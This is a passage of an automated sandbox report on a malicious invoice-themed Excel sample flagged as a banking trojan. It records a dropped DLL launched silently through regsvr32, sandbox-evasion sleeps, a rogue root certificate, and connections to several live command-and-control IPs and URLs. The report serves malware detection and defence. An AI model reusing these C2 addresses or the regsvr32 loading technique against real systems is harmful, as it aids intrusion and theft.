    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -329000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -258000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -272000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -298000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -333000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912Thread sleep time: -283000s >= -30000s
    Source: C:\Windows\System32\DWWIN.EXE TID: 2464Thread sleep time: -60000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008BCEF8 FindFirstFileExW,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008A3930 GetTokenInformation,GetTokenInformation,GetSystemInfo,GetTokenInformation,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information queried: ProcessInformation
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008A6C50 LdrLoadDll,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10002140 LoadLibraryA,GetProcAddress,VirtualAlloc,VirtualAlloc,VirtualAlloc,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008A7A60 RtlAddVectoredExceptionHandler,

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    System process connects to network (likely due to code injection or exploit)Show sources
    Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 80.86.91.27 236
    Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 5.100.228.233 61
    Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 46.105.131.65 232
    Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 77.220.64.37 187
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\lwjmdgav.dll.
    Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXEProcess created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1488
    Source: Yara matchFile source: Inv0209966048-20210111075675.xls, type: SAMPLE
    Source: regsvr32.exe, 00000003.00000002.2406916766.0000000000990000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2408754129.0000000000F90000.00000002.00000001.sdmpBinary or memory string: Program Manager
    Source: regsvr32.exe, 00000003.00000002.2406916766.0000000000990000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2408754129.0000000000F90000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
    Source: regsvr32.exe, 00000003.00000002.2406916766.0000000000990000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2408754129.0000000000F90000.00000002.00000001.sdmpBinary or memory string: !Progman
    Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008A2980 GetUserNameW,
    Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 BlobJump to behavior

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting22Path InterceptionProcess Injection112Masquerading11OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsExploitation for Client Execution43Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSAccount Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting22LSA SecretsSystem Owner/User Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRegsvr321DCSyncSystem Network Configuration Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemFile and Directory Discovery2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Information Discovery14Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Inv0209966048-20210111075675.xls45%VirustotalBrowse
    Inv0209966048-20210111075675.xls17%MetadefenderBrowse
    Inv0209966048-20210111075675.xls35%ReversingLabsScript-Macro.Trojan.Remcos

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\lwjmdgav.dll100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\w80l82r[1].zip100%Joe Sandbox ML

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    education.scrollx.in2%VirustotalBrowse
    cdn.digicertcdn.com0%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://5.100.228.233:3389/2%VirustotalBrowse
    https://5.100.228.233:3389/0%Avira URL Cloudsafe
    https://80.86.91.27:3308/TATE0%Avira URL Cloudsafe
    http://ocsp.entrust.net030%URL Reputationsafe
    http://ocsp.entrust.net030%URL Reputationsafe
    http://ocsp.entrust.net030%URL Reputationsafe
    http://ocsp.entrust.net030%URL Reputationsafe
    https://80.86.91.27/0%Avira URL Cloudsafe
    https://5.100.228.233/=0%Avira URL Cloudsafe
    https://5.100.228.233:3389/in0%Avira URL Cloudsafe
    https://77.220.64.37/-39;0%Avira URL Cloudsafe
    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    https://77.220.64.37/0;0%Avira URL Cloudsafe
    https://46.105.131.65:1512/0%Avira URL Cloudsafe
    https://46.105.131.65/0%Avira URL Cloudsafe
    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    https://5.100.228.233:3389/o0%Avira URL Cloudsafe
    https://5.100.228.233:3389/H0%Avira URL Cloudsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://ocsp.entrust.net0D0%URL Reputationsafe
    http://ocsp.entrust.net0D0%URL Reputationsafe
    http://ocsp.entrust.net0D0%URL Reputationsafe
    https://46.105.131.65:1512/an0%Avira URL Cloudsafe
    https://5.100.228.233/0%Avira URL Cloudsafe
    http://servername/isapibackend.dll0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    education.scrollx.in
    104.27.153.52
    truefalseunknown
    cdn.digicertcdn.com
    104.18.11.39
    truefalseunknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://www.windows.com/pctv.DWWIN.EXE, 00000007.00000002.2260615326.0000000003250000.00000002.00000001.sdmpfalse
      high
      https://5.100.228.233:3389/regsvr32.exe, 00000004.00000003.2205277449.00000000003DD000.00000004.00000001.sdmpfalse
      • 2%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      http://investor.msn.comDWWIN.EXE, 00000007.00000002.2260615326.0000000003250000.00000002.00000001.sdmpfalse
        high
        http://www.msnbc.com/news/ticker.txtDWWIN.EXE, 00000007.00000002.2260615326.0000000003250000.00000002.00000001.sdmpfalse
          high
          https://80.86.91.27:3308/TATEregsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://crl.entrust.net/server1.crl0regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2261028499.000000000369D000.00000004.00000001.sdmpfalse
            high
            http://ocsp.entrust.net03regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2261028499.000000000369D000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            https://80.86.91.27/regsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://5.100.228.233/=regsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://5.100.228.233:3389/inregsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://77.220.64.37/-39;regsvr32.exe, 00000004.00000002.2406932128.000000000036D000.00000004.00000020.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2255931534.00000000036B4000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://www.diginotar.nl/cps/pkioverheid0regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2255931534.00000000036B4000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://windowsmedia.com/redir/services.asp?WMPFriendly=trueDWWIN.EXE, 00000007.00000002.2260811324.0000000003437000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://www.hotmail.com/oeDWWIN.EXE, 00000007.00000002.2260615326.0000000003250000.00000002.00000001.sdmpfalse
              high
              https://77.220.64.37/0;regsvr32.exe, 00000004.00000002.2406932128.000000000036D000.00000004.00000020.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://46.105.131.65:1512/regsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://46.105.131.65/regsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&CheckDWWIN.EXE, 00000007.00000002.2260811324.0000000003437000.00000002.00000001.sdmpfalse
                high
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl0regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2255931534.00000000036B4000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.icra.org/vocabulary/.DWWIN.EXE, 00000007.00000002.2260811324.0000000003437000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000004.00000002.2409391868.0000000002390000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2261214468.0000000004000000.00000002.00000001.sdmpfalse
                  high
                  https://5.100.228.233:3389/oregsvr32.exe, 00000004.00000002.2406908102.000000000033F000.00000004.00000020.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://investor.msn.com/DWWIN.EXE, 00000007.00000002.2260615326.0000000003250000.00000002.00000001.sdmpfalse
                    high
                    https://5.100.228.233:3389/Inregsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmpfalse
                      unknown
                      https://5.100.228.233:3389/Hregsvr32.exe, 00000004.00000002.2406908102.000000000033F000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.%s.comPAregsvr32.exe, 00000004.00000002.2409391868.0000000002390000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2261214468.0000000004000000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      low
                      http://ocsp.entrust.net0Dregsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2256367652.00000000001E0000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://46.105.131.65:1512/anregsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://secure.comodo.com/CPS0regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2256002610.000000000015E000.00000004.00000001.sdmpfalse
                        high
                        https://5.100.228.233/regsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.2406957167.0000000001D90000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2407102495.00000000009A0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2257019838.00000000024C0000.00000002.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        http://crl.entrust.net/2048ca.crl0regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2256367652.00000000001E0000.00000004.00000001.sdmpfalse
                          high

                          Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public

                          IPDomainCountryFlagASNASN NameMalicious
                          5.100.228.233
                          unknownNetherlands
                          8315SENTIANLtrue
                          80.86.91.27
                          unknownGermany
                          8972GD-EMEA-DC-SXB1DEtrue
                          46.105.131.65
                          unknownFrance
                          16276OVHFRtrue
                          104.27.153.52
                          unknownUnited States
                          13335CLOUDFLARENETUSfalse
                          77.220.64.37
                          unknownItaly
                          44160INTERNETONEInternetServicesProviderITtrue

                          General Information

                          Joe Sandbox Version:31.0.0 Red Diamond
                          Analysis ID:338362
                          Start date:12.01.2021
                          Start time:07:38:42
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 7m 45s
                          Hypervisor based Inspection enabled:false
                          Report type:light
                          Sample file name:Inv0209966048-20210111075675.xls
                          Cookbook file name:defaultwindowsofficecookbook.jbs
                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                          Number of analysed new started processes analysed:10
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • GSI enabled (VBA)
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.bank.expl.evad.winXLS@9/18@1/5
                          EGA Information:Failed
                          HDC Information:
                          • Successful, ratio: 11.7% (good quality ratio 11.5%)
                          • Quality average: 79.7%
                          • Quality standard deviation: 19.5%
                          HCA Information:
                          • Successful, ratio: 87%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Found application associated with file extension: .xls
                          • Found Word or Excel or PowerPoint or XPS Viewer
                          • Found warning dialog
                          • Click Ok
                          • Found warning dialog
                          • Click Ok
                          • Found warning dialog
                          • Click Ok
                          • Attach to Office via COM
                          • Close Viewer
                          Warnings:
                          Show All
                          • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                          • TCP Packets have been reduced to 100
                          • Excluded IPs from analysis (whitelisted): 67.26.73.254, 8.253.95.249, 8.248.139.254, 8.253.95.121, 67.27.157.254, 40.88.32.150, 52.255.188.83, 104.18.11.39
                          • Excluded domains from analysis (whitelisted): skypedataprdcoleus15.cloudapp.net, skypedataprdcoleus17.cloudapp.net, watson.microsoft.com, audownload.windowsupdate.nsatc.net, blobcollector.events.data.trafficmanager.net, cacerts.digicert.com, ctldl.windowsupdate.com, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtCreateFile calls found.
                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                          • Report size getting too big, too many NtEnumerateValueKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Report size getting too big, too many NtSetInformationFile calls found.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          07:39:55API Interceptor1141x Sleep call for process: regsvr32.exe modified
                          07:40:17API Interceptor515x Sleep call for process: DWWIN.EXE modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          5.100.228.233xad05r9ba.dllGet hashmaliciousBrowse
                            mcluc5u.dllGet hashmaliciousBrowse
                              INV2680371456-20210111889374.xlsmGet hashmaliciousBrowse
                                INV8073565781-20210111319595.xlsmGet hashmaliciousBrowse
                                  HkNkyKl3uT.dllGet hashmaliciousBrowse
                                    ceepq536n.zip.dllGet hashmaliciousBrowse
                                      sample20210111-01.xlsmGet hashmaliciousBrowse
                                        INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                                          hiytvys.dllGet hashmaliciousBrowse
                                            l7rgi3xyd.dllGet hashmaliciousBrowse
                                              ymuyks.dllGet hashmaliciousBrowse
                                                INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                  hy9x6wzip.dllGet hashmaliciousBrowse
                                                    INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                      jufk0vrar.dllGet hashmaliciousBrowse
                                                        80.86.91.27xad05r9ba.dllGet hashmaliciousBrowse
                                                          mcluc5u.dllGet hashmaliciousBrowse
                                                            INV2680371456-20210111889374.xlsmGet hashmaliciousBrowse
                                                              INV8073565781-20210111319595.xlsmGet hashmaliciousBrowse
                                                                HkNkyKl3uT.dllGet hashmaliciousBrowse
                                                                  ceepq536n.zip.dllGet hashmaliciousBrowse
                                                                    sample20210111-01.xlsmGet hashmaliciousBrowse
                                                                      INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                                                                        hiytvys.dllGet hashmaliciousBrowse
                                                                          l7rgi3xyd.dllGet hashmaliciousBrowse
                                                                            ymuyks.dllGet hashmaliciousBrowse
                                                                              INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                                                hy9x6wzip.dllGet hashmaliciousBrowse
                                                                                  INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                                    jufk0vrar.dllGet hashmaliciousBrowse
                                                                                      46.105.131.65xad05r9ba.dllGet hashmaliciousBrowse
                                                                                        mcluc5u.dllGet hashmaliciousBrowse
                                                                                          INV2680371456-20210111889374.xlsmGet hashmaliciousBrowse
                                                                                            INV8073565781-20210111319595.xlsmGet hashmaliciousBrowse
                                                                                              HkNkyKl3uT.dllGet hashmaliciousBrowse
                                                                                                ceepq536n.zip.dllGet hashmaliciousBrowse
                                                                                                  sample20210111-01.xlsmGet hashmaliciousBrowse
                                                                                                    INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                                                                                                      hiytvys.dllGet hashmaliciousBrowse
                                                                                                        l7rgi3xyd.dllGet hashmaliciousBrowse
                                                                                                          ymuyks.dllGet hashmaliciousBrowse
                                                                                                            INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                                                                              hy9x6wzip.dllGet hashmaliciousBrowse
                                                                                                                INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                                                                  jufk0vrar.dllGet hashmaliciousBrowse
                                                                                                                    77.220.64.37xad05r9ba.dllGet hashmaliciousBrowse
                                                                                                                      mcluc5u.dllGet hashmaliciousBrowse
                                                                                                                        INV2680371456-20210111889374.xlsmGet hashmaliciousBrowse
                                                                                                                          INV8073565781-20210111319595.xlsmGet hashmaliciousBrowse
                                                                                                                            HkNkyKl3uT.dllGet hashmaliciousBrowse
                                                                                                                              ceepq536n.zip.dllGet hashmaliciousBrowse
                                                                                                                                sample20210111-01.xlsmGet hashmaliciousBrowse
                                                                                                                                  INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                                                                                                                                    hiytvys.dllGet hashmaliciousBrowse
                                                                                                                                      l7rgi3xyd.dllGet hashmaliciousBrowse
                                                                                                                                        ymuyks.dllGet hashmaliciousBrowse
                                                                                                                                          INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                                                                                                            hy9x6wzip.dllGet hashmaliciousBrowse
                                                                                                                                              INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                                                                                                jufk0vrar.dllGet hashmaliciousBrowse
                                                                                                                                                  SecuriteInfo.com.Trojan.Dridex.735.5073.dllGet hashmaliciousBrowse
                                                                                                                                                    1 Total New Invoices-Monday December 14 2020.xlsGet hashmaliciousBrowse
                                                                                                                                                      1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                                                                        1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                                                                          1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse

                                                                                                                                                            Domains

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                            cdn.digicertcdn.comINV2680371456-20210111889374.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 104.18.10.39
                                                                                                                                                            INV8073565781-20210111319595.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 104.18.11.39
                                                                                                                                                            sample20210111-01.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 104.18.10.39
                                                                                                                                                            INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 104.18.11.39
                                                                                                                                                            INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 104.18.10.39
                                                                                                                                                            INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 104.18.10.39
                                                                                                                                                            SurfsharkSetup.exeGet hashmaliciousBrowse
                                                                                                                                                            • 104.18.10.39
                                                                                                                                                            https://correolimpio.telefonica.es/atp/url-check.php?URL=https%3A%2F%2Fnhabeland.vn%2Fsercurirys%2FRbvPk%2F&D=53616c7465645f5f824c0b393b6f3e2d3c9a50d9826547979a4ceae42fdf4a21ec36a319de1437ef72976b2e7ef710bdb842a205880238cf08cf04b46eccce50114dbc4447f1aa62068b81b9d426da6b&V=1Get hashmaliciousBrowse
                                                                                                                                                            • 104.18.10.39
                                                                                                                                                            ASHLEY NAIDOO CV.docGet hashmaliciousBrowse
                                                                                                                                                            • 104.18.10.39
                                                                                                                                                            RFQ.docGet hashmaliciousBrowse
                                                                                                                                                            • 104.18.10.39
                                                                                                                                                            SecuriteInfo.com.Trojan.BtcMine.3311.17146.exeGet hashmaliciousBrowse
                                                                                                                                                            • 104.18.11.39
                                                                                                                                                            http://test.kunmiskincare.com/index.phpGet hashmaliciousBrowse
                                                                                                                                                            • 104.18.11.39
                                                                                                                                                            https://email.utest.com/ls/click?upn=Q3qQnfemZbaKqqMTD32WX0Q-2F38lqT2tAzE5eVnmPd7-2BQtbqdrAGPxGIiQmtbZbEcQfp88ilOu42BqywW-2BHQ-2F36ib8mcb8EYG4w64Icmefi3xXbpzwMP3NQ3974KeR1Cm-2FtwcR7xFilzHs6N8iNLyS48aGcVYmSpzSB5rZFj7iHuxTwLnTumc1AOR4vtcYHqqiqHY7g-2B-2FJ-2Bp2X-2FMfZ-2FQF6-2BtQvwrHR4Do9NZhu9Dvij-2BKa330W7UbuEz2iIv6oZ18C14g_HT-2FwmlBF7R5nW6HayR9wjpSE-2FEYoNhBRZJxfk0aqS7vYxNZiuzaetMNdYjE6WQ7lhnX-2F3CEUYMAVCWb9b2KoxJgG7bbDpZV8jJzJcz-2FHdj603HdwbUFnR5bNfB4iXdW0ho4xmgP3jr4yW0dQVZ-2FVH-2B4BUSDEwiU9rMA5oZN54vSw8okk6D-2FopaYrwFKHesb3rZ-2B-2FXvvZXiTmiwexXLF98nxPgg28hqPBVP8Ce82XUi0-3DGet hashmaliciousBrowse
                                                                                                                                                            • 104.18.10.39
                                                                                                                                                            https://email.utest.com/ls/click?upn=eSGWhpVX2YfcJc4oKRJyCitYauf8dzcbVvAmQmQH4oZBbVMlkneKSVGqyJywGhpngTJJbZcqKw2ZrPBb6oQsQjUFyq4tbqbTGCzxR1eG4Z9O9abaPDZxc5NM1HvYjLOzed8zOYLIYcXnFBAxNAMQRlQBs6-2FmRK-2BaDDT2yagiQtTusU0-2FuKBxVVMBtDF3y-2BvaUDK48BxfAjoAvSGh6p8tJcMdNHuC687sMnINVJLdmfU-3D7Y6S_CzF3IAhuvYaPWoKJ87ALtJgaMHByYMlBwvQVuZ3bhcFe4St6cx8KCfN-2B2rcCNvOA-2BeX4QMjQb-2FUgtEcK8j5R6EI1G-2BBWI35h9mDCE7AAF1w3V3wR14L28vyaTqJbw5uQyTI0DJse16q7T2cnyVezsqen7-2F42lXjAhKUL9SqUvgoogoRMVuUrByVc8HvS0sQEQjAPQ8xNbeD4KhQ-2BMcqRFg-3D-3DGet hashmaliciousBrowse
                                                                                                                                                            • 104.18.11.39
